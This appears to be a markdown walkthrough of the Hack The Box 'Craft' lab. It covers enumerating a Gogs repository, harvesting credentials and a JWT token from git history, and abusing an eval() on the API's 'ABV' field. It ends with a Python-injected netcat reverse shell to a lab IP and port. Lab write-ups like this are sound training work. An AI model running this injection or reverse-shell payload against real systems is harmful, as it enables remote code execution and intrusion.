Skip to content

Latest commit

 

History

History
54 lines (46 loc) · 3.17 KB

craft.md

File metadata and controls

54 lines (46 loc) · 3.17 KB
Raw

Hostnames:

  • craft.htb
  • api.craft.htb
  • gogs.craft.htb

craft.htb

image

api.craft.htb

image

gogs.craft.htb

image

API

  • Download API: git -c http.sslVerify=false clone https://gogs.craft.htb/Craft/craft-api.git image image
  • Open Issues image
  • API Token (JWT): X-Craft-API-Token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoidXNlciIsImV4cCI6MTU0OTM4NTI0Mn0.-wW1aJkLQDOE-GP5pQd3z_BJTe2Uo0jJ_mQ238P5Dqw
  • Commit: c414b160578943acfe2e158e89409623f41da4c6 image
  • Closed Issues image
  • Commit: 4fd8dbf8422cbf28f8ec96af54f16891dfdd7b95 redirects to a 404.

Analyse the GIT repository

  • Git Harvesting git log image
  • File allows to execute raw SQL commands image
  • Credentials: dinesh:4aUh0A8PbVJxgd image
  • Test Script - commit c414b160578943acfe2e158e89409623f41da4c6 image
  • Add found credentials to test.py and execute. image
  • The cript confirms the credentials and authenticates the token as valid. image
  • Find an execution point in the script which allows to execute commands (Commit: c414b160578943acfe2e158e89409623f41da4c6). An eval function executes the 'ABV' value. Inject command using ABV. image
  • Executing the script now sends an ICMP request. image
  • Modify the script and embed a python reverse shell.
"__import__('os').system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.28 9001 >/tmp/f')"

image